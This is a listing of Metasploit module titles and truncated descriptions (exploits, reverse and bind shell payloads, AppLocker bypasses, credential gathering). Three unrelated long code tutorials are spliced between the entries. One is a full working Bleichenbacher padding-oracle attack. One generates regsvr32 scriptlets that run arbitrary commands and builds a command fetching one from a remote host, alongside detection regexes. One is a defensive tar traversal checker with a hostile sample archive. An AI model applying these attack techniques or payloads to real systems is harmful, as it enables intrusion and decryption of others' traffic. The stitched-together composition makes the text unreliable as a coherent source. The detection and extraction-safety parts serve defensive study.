6846 matches found
BASE base_qry_common Remote File Include
This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'BASE base_qry_common Remote Fil...
Microsoft SQL Server Command Execution
This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure (default) or the sp_OACreate procedure (more opsec safe: no output, no temporary data table). Either path only works if the corresponding server option (xp_cmdshell, or Ole Automation Procedures) is enabled. A valid username and password is required to use this module. This module requires Metasploit:...
Realtek Media Player Playlist Buffer Overflow
This module exploits a stack buffer overflow in Realtek Media Player (RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows Command Shell, Bind TCP (via Ruby)
Continually listen for a connection and spawn a command shell via Ruby This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 128 include Msf::Payload::Single include...
EMC AlphaStor Library Manager Arbitrary Command Execution
EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
This module exploits a stack buffer overflow in the authentication mechanism of NSI DoubleTake, which is also rebranded as HP StorageWorks. This vulnerability was found by Titon of Bastard Labs. This module requires Metasploit: https://metasploit.com/download Current source:...
Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Samba lsa_io_trans_names Heap Overflow', 'Description' => %q This...
PHP Command Shell, Bind TCP (via Perl)
Listen for a connection and spawn a command shell via perl (persistent). This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include...
Oracle 9i XDB HTTP PASS Overflow (win32)
This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB) during a seminar on "Variations in exploit methods between Linux and Windows" presented at the...
Cisco Configuration Importer
This module imports a Cisco IOS or NXOS device configuration. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Configuration Importer', 'Description' => %q This module imports a Cisco IOS o...
Docker-Credential-Wincred.exe Privilege Escalation
This exploit leverages a vulnerability in Docker Desktop Community editions prior to 2.1.0.1, where an attacker can write a payload to a lower-privileged area that is then executed automatically by the Docker user at login. This module requires Metasploit: https://metasploit.com/download Current source:...
Applocker Evasion - Microsoft Workflow Compiler
This module will assist you in evading Microsoft Windows AppLocker and Software Restriction Policies. This technique utilises the Microsoft-signed binary Microsoft.Workflow.Compiler.exe to execute user-supplied code. This module requires Metasploit: https://metasploit.com/download Current sourc...
Applocker Evasion - Windows Presentation Foundation Host
This module will assist you in evading Microsoft Windows AppLocker and Software Restriction Policies. This technique utilises the Microsoft-signed binary PresentationHost.exe to execute user-supplied code. This module requires Metasploit: https://metasploit.com/download Current source:...
Ruby Pingback, Bind TCP
Listens for a connection from the attacker, sends a UUID, then terminates. module MetasploitModule CachedSize = 103 include Msf::Payload::Single include Msf::Payload::Ruby include Msf::Payload::Pingback include Msf::Payload::Pingback::Options def initialize(info = {}) super(merge_info(info, 'Name' => 'Ruby...
Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet cla...
Unix Command Shell, Reverse UDP (/dev/udp)
Creates an interactive shell via bash's built-in /dev/udp redirection. This will not work on circa-2009 and older Debian-based Linux distributions, including Ubuntu, because they compile bash without the /dev/udp feature. This module requires Metasploit: https://metasploit.com/download Current source:...
CAN Flood
This module floods a CAN interface with supplied frames. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CAN Flood', 'Description' => 'This module floods a CAN interface with supplied frames.',...
Exchange email enumeration
Error-based user enumeration for Office 365 integrated email addresses //usr/bin/env go run "$0" "$@"; exit "$?" package main import "crypto/tls" "fmt" "metasploit/module" "msmail" "net/http" "strconv" "strings" "sync" func main metadata := &module.Metadata Name: "Exchange email enumeration",...
On premise user enumeration
On premise enumeration of valid exchange users //usr/bin/env go run "$0" "$@"; exit "$?" package main import "crypto/tls" "metasploit/module" "msmail" "net/http" "sort" "strconv" "sync" "time" func main metadata := &module.Metadata Name: "On premise user enumeration", Description: "On premise...
Peinjector
This module will inject a specified Windows payload into a target executable. require 'rex' class MetasploitModule 'Peinjector', 'Description' => %q This module will inject a specified Windows payload into a target executable. , 'License' => MSF_LICENSE, 'Author' => 'Maximiliano Tedesco ', 'Platform'...
Cisco ASA Directory Traversal
This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software. It lists the contents of Cisco's VPN web service, which includes directories, files, and currently logged-in users. This module requires Metasploi...
Pseudo-Shell Post-Exploitation Module
This module will run a Pseudo-Shell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'readline' class MetasploitModule Msf::Post include Msf::Post::File include Msf::Post::Unix include Msf::Post::Linux::System...
Multi Manage the screensaver of the target computer
This module allows you to turn the screensaver of the target computer on or off and also lock the current session. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Multi Manage the screensaver o...
GitStack Unsanitized Argument RCE
This module exploits a remote code execution vulnerability that exists in GitStack through v2.3.10, caused by an unsanitized argument being passed to an exec function call. This module has been tested on GitStack v2.3.10. This module requires Metasploit: https://metasploit.com/download Current...
Scanner for Bleichenbacher Oracle in RSA PKCS #1 v1.5
Some TLS implementations handle errors while processing RSA key exchanges and PKCS #1 v1.5 encrypted messages in a broken way that leads to an adaptive chosen-ciphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when th...
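The blurb above names the attack but not its mechanics. The following is an added example, not the scanner module's code: it implements Bleichenbacher's algorithm against a padding oracle that reveals only whether a decrypted block starts with 00 02, on a toy RSA key built from two public Mersenne primes so that it finishes in seconds. The key, the message and the oracle are constructed here for illustration; a real TLS oracle differs only in how the "conforming / not conforming" signal leaks (alerts, timing, or a Finished message), and a 2048-bit key needs the same algorithm with far more queries.

```python
"""Bleichenbacher adaptive chosen-ciphertext attack on a PKCS #1 v1.5 padding
oracle. Added example; not code from the Metasploit scanner. Toy key only."""
import random

P = (1 << 61) - 1                   # Mersenne prime M61 (public, toy use only)
Q = (1 << 89) - 1                   # Mersenne prime M89 (public, toy use only)
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent (Python 3.8+ modular inverse)
K = (N.bit_length() + 7) // 8       # modulus length in bytes (19 for this key)
B = 1 << (8 * (K - 2))              # conforming plaintexts lie in [2B, 3B)


def pkcs1_v15_pad(msg: bytes, rng: random.Random) -> int:
    """00 02 <at least 8 non-zero random bytes> 00 <msg>, as an integer."""
    ps_len = K - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for this modulus")
    ps = bytes(rng.randrange(1, 256) for _ in range(ps_len))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")


def encrypt(msg: bytes, rng: random.Random) -> int:
    return pow(pkcs1_v15_pad(msg, rng), E, N)


class PaddingOracle:
    """The leak: answers only whether c^d mod n starts with 00 02."""
    def __init__(self):
        self.queries = 0

    def conforming(self, c: int) -> bool:
        self.queries += 1
        return 2 * B <= pow(c, D, N) < 3 * B


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def bleichenbacher(c: int, oracle: PaddingOracle) -> int:
    """Recover m = c^d mod n using only the oracle (steps 2-4 of the paper;
    step 1 blinding is skipped because a real ciphertext is already conforming)."""
    assert oracle.conforming(c)
    M = [(2 * B, 3 * B - 1)]
    s = ceil_div(N, 3 * B)
    first = True
    while True:
        if first:                                   # step 2a: smallest s with a conforming c*s^e
            while not oracle.conforming(c * pow(s, E, N) % N):
                s += 1
            first = False
        elif len(M) > 1:                            # step 2b: several intervals, keep scanning
            s += 1
            while not oracle.conforming(c * pow(s, E, N) % N):
                s += 1
        else:                                       # step 2c: one interval, jump via r
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            found = False
            while not found:
                lo = ceil_div(2 * B + r * N, b)
                hi = (3 * B - 1 + r * N) // a
                for cand in range(lo, hi + 1):
                    if oracle.conforming(c * pow(cand, E, N) % N):
                        s, found = cand, True
                        break
                r += 1
        new_M = set()                               # step 3: narrow every interval with the new s
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                na = max(a, ceil_div(2 * B + r * N, s))
                nb = min(b, (3 * B - 1 + r * N) // s)
                if na <= nb:
                    new_M.add((na, nb))
        M = sorted(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:      # step 4: interval collapsed to m
            return M[0][0]


def unpad(m: int) -> bytes:
    block = m.to_bytes(K, "big")
    return block[block.index(b"\x00", 2) + 1:]


def demo(msg: bytes = b"hi"):
    """Encrypt a constructed message, then recover it through the oracle."""
    rng = random.Random(1)
    oracle = PaddingOracle()
    m = bleichenbacher(encrypt(msg, rng), oracle)
    return unpad(m), oracle.queries


if __name__ == "__main__":
    print(demo())
```

Only the oracle ever touches the private exponent; the attacker side uses the public key and the yes/no answers. The query count the demo returns is the number a defender would see as anomalous bursts of failed RSA key exchanges from one client.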
Ayukov NFTP FTP Client Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability against the Ayukov NFTPD FTP Client 2.0 and earlier. By responding with a long string of data to the SYST request, it is possible to cause a denial-of-service condition on the FTP client, or arbitrary remote code execution under the...
Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow
This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Linux Meterpreter, Reverse TCP Inline
Run the Meterpreter / Mettle server payload (stageless). This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1137332 include...
Linux Meterpreter, Reverse HTTPS Inline
Run the Meterpreter / Mettle server payload (stageless). This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1271304 include...
Scan CAN Bus for Diagnostic Modules
Post module to scan the CAN bus for any modules that can respond to UDS DSC queries. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Scan CAN Bus for Diagnostic Modules', 'Description' => %q Post...
Varnish Cache CLI Login Utility
This module attempts to log in to the Varnish Cache (varnishd) CLI instance using a bruteforce list of passwords. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credential_collection' requir...
Android Meterpreter Shell, Reverse TCP Inline
Connect back to the attacker and spawn a Meterpreter shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::TransportConfig include Msf::Payload::Sing...
OpenNMS Java Object Unserialization Remote Code Execution
This module exploits a vulnerability in the OpenNMS Java object which allows an unauthenticated attacker to run arbitrary code against the system. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Regsvr32.exe (.sct) Command Delivery Server
This module uses the Regsvr32.exe Application Whitelisting Bypass technique as a way to run a command on a target system. The major advantage of this technique is that you can execute a static command on the target system and dynamically and remotely change the command that will actually run by...
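The three entries above (the two AppLocker evasion modules and this Regsvr32 scriptlet server) all execute code through a Microsoft-signed binary. The following is an added example, not code from any of those modules: it builds the minimal COM scriptlet that `regsvr32 /i:<url> scrobj.dll` loads, and runs simple detection rules over constructed process-creation command lines for all three binaries. The `.sct` layout is the well-known public form; the rule regexes, the sample events and the 192.0.2.10 host are assumptions for illustration and will need tuning against real telemetry.

```python
"""Regsvr32 scriptlet generation and LOLBin command-line detection.
Added example; not code from the Metasploit modules on this page."""
import json
import re
import uuid

# Classic COM scriptlet: regsvr32 /i:<url> scrobj.dll runs the registration script.
SCT_TEMPLATE = """<?XML version="1.0"?>
<scriptlet>
<registration progid="Example" classid="{classid}">
<script language="JScript"><![CDATA[
  new ActiveXObject("WScript.Shell").Run({cmd}, 0, false);
]]></script>
</registration>
</scriptlet>
"""


def build_sct(command: str, classid: str = None) -> str:
    """Return a scriptlet that runs `command`; json.dumps yields a safe JScript literal."""
    classid = classid or "{%s}" % uuid.uuid4()
    return SCT_TEMPLATE.format(classid=classid, cmd=json.dumps(command))


def regsvr32_cmdline(url: str) -> str:
    """The static command the target runs; only the content behind `url` changes."""
    return "regsvr32.exe /s /n /u /i:%s scrobj.dll" % url


# Detection rules (assumed; tune for your environment). Each matches a command line.
RULES = {
    "regsvr32_remote_scriptlet": re.compile(
        r"regsvr32(\.exe)?\b.*(?:[/-]i:\S*https?://|scrobj\.dll)", re.I),
    "workflow_compiler": re.compile(r"Microsoft\.Workflow\.Compiler\.exe\b", re.I),
    "presentationhost_xbap": re.compile(r"PresentationHost\.exe\b.*\.xbap\b", re.I),
}


def classify(cmdline: str):
    """Names of every rule the command line trips, in a stable order."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    r"regsvr32.exe /s /n /u /i:http://192.0.2.10/a.sct scrobj.dll",
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Users\bob\run.xml out.xml",
    r"C:\Windows\System32\PresentationHost.exe C:\Users\bob\Downloads\app.xbap",
    r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',   # benign registration
]


def scan(events):
    return [(e, classify(e)) for e in events]


if __name__ == "__main__":
    print(build_sct("calc.exe"))
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(hits or "-", cmdline)
```

The last sample line is the ordinary local DLL registration that the first rule must not flag; `/i:` with a URL, or `scrobj.dll` on the command line, is what separates the bypass from everyday use.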
Android ADB Debug Server Remote Payload Execution
Writes and spawns a native payload on an android device that is listening for adb debug messages. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Android ADB Debug Server Remote Payload...
BusyBox Enumerate Connections
This module will be applied on a session connected to a BusyBox shell. It will enumerate the connections established with the router or device executing BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
VMWare Update Manager 4 Directory Traversal
This module exploits a directory traversal vulnerability in VMware Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4. This module requires Metasploit: https://metasploit.com/download Current sourc...
BSD x64 Command Shell, Reverse TCP Inline (IPv6)
Connect back to attacker and spawn a command shell over IPv6 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 105 include Msf::Payload::Single include Msf::Payload::Bsd include...
Windows Gather Active Directory BitLocker Recovery
This module will enumerate BitLocker recovery passwords in the default AD directory. This module does require Domain Admin or other delegated privileges. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
Belkin Play N750 login.cgi Buffer Overflow
This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB Wireless Dual-Band N+ (N750) routers. The vulnerability exists in the handling of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing remote unauthenticated attackers to execute...
PXE Boot Exploit Server
This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a Linux kernel and initrd into memory that reads the hard drive, placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and add a uid...
MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet Explorer 10 and 11. By default, you will steal the cookie from TARGETURI, which cannot have X-Frame-Options or it will fail. You can also have your own custom JavaScript by setting the CUSTOMJS option. Lastl...
WordPress Pixabay Images PHP Code Upload
This module exploits multiple vulnerabilities in the WordPress plugin Pixabay Images 2.3.6. The plugin does not check the host of a provided download URL which can be used to store and execute malicious PHP code on the system. This module requires Metasploit: https://metasploit.com/download Curre...
Reflective DLL Injection, Hidden Bind TCP Stager
Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 343...
VNC Server (Reflective Injection), Hidden Bind TCP Stager
Inject a VNC DLL via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...
Tincd Post-Authentication Remote TCP Stack Buffer Overflow
This module exploits a stack buffer overflow in Tinc's tincd service. After authentication, a specially crafted TCP packet (default port 655) leads to a buffer overflow and allows execution of arbitrary code. This module has been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows ...
GNU Wget FTP Symlink Arbitrary Filesystem Access
This module exploits a vulnerability in Wget when used in recursive (-r) mode with an FTP server as the destination. A symlink is used to allow arbitrary writes to the target's filesystem. To specify content for the file, use the "file:/path" syntax for the TARGETDATA option. Tested successfully with...
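Both the Cisco Prime TarArchive entry and this Wget entry are the same bug class seen from two sides: an unpacker that trusts member names with `..` in them, and a client that recreates a server-supplied symlink and then writes through it. The following is an added example, not code from either module or project: it constructs a small archive containing a benign file, a `../` traversal entry and a symlink pointing outside the extraction directory, and shows the check a safe extractor performs before touching disk. The member names and the extraction directory are hypothetical.

```python
"""Archive path-traversal and link-escape checks. Added example; not code
from the Cisco Prime or Wget modules. The sample archive is constructed here."""
import io
import os
import tarfile
import tempfile


def build_sample_tar() -> bytes:
    """Constructed archive: a benign file, a '../' traversal entry, and a
    symlink whose target resolves outside the extraction directory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b"hello\n"
        for name in ("app/config.txt", "../../evil.txt"):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        link = tarfile.TarInfo("app/passwd")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../../etc/passwd"
        tar.addfile(link)
    return buf.getvalue()


def _inside(root: str, path: str) -> bool:
    return os.path.commonpath([root, path]) == root


def unsafe_members(tar_bytes: bytes, dest: str):
    """Return (name, reason) for each member that would land, or point, outside dest.

    Two rules: (1) no absolute names and no '..' components at all, because a
    lexical check alone can be fooled once an in-archive symlink exists on disk;
    (2) every link target must resolve inside dest. Together they mean no write
    can leave dest, whatever order the members are extracted in."""
    dest = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar.getmembers():
            parts = m.name.replace("\\", "/").split("/")
            if os.path.isabs(m.name) or ".." in parts:
                bad.append((m.name, "absolute or '..' path"))
                continue
            if m.issym() or m.islnk():
                target = os.path.join(dest, m.name)
                # symlink targets are relative to the link's directory, hard-link
                # targets to the archive root
                base = os.path.dirname(target) if m.issym() else dest
                resolved = os.path.realpath(os.path.join(base, m.linkname))
                if not _inside(dest, resolved):
                    bad.append((m.name, "link target escapes destination"))
    return bad


def safe_extract(tar_bytes: bytes, dest: str) -> None:
    """Refuse the whole archive if any member fails the check."""
    bad = unsafe_members(tar_bytes, dest)
    if bad:
        raise ValueError("refusing to extract: %r" % (bad,))
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        tar.extractall(dest)   # Python 3.12+: extractall(dest, filter="data") adds a similar check


def demo():
    """Names of the members the checker rejects in the constructed archive."""
    dest = os.path.join(tempfile.gettempdir(), "extract-demo")
    return sorted(name for name, _ in unsafe_members(build_sample_tar(), dest))


if __name__ == "__main__":
    print(demo())
```

Rejecting the archive outright, rather than skipping the bad members, is deliberate: an archive that contains a traversal entry is hostile, and partially extracting it only leaves the reviewer guessing what else it was meant to do.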
HP Network Node Manager I PMD Buffer Overflow
This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The vulnerability exists in the pmd service, due to the insecure usage of functions like strcpy and strcat while handling stackoption packets with user-controlled data. In order to bypass ASLR this module uses a...
Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection
This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This module can be used to extract the site and project usernames and...
Adobe Flash Player Regular Expression Heap Overflow
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted swf file with special regex value, it is possible to trigger a memory corruption, which results in remote code execution under the context of the user, a...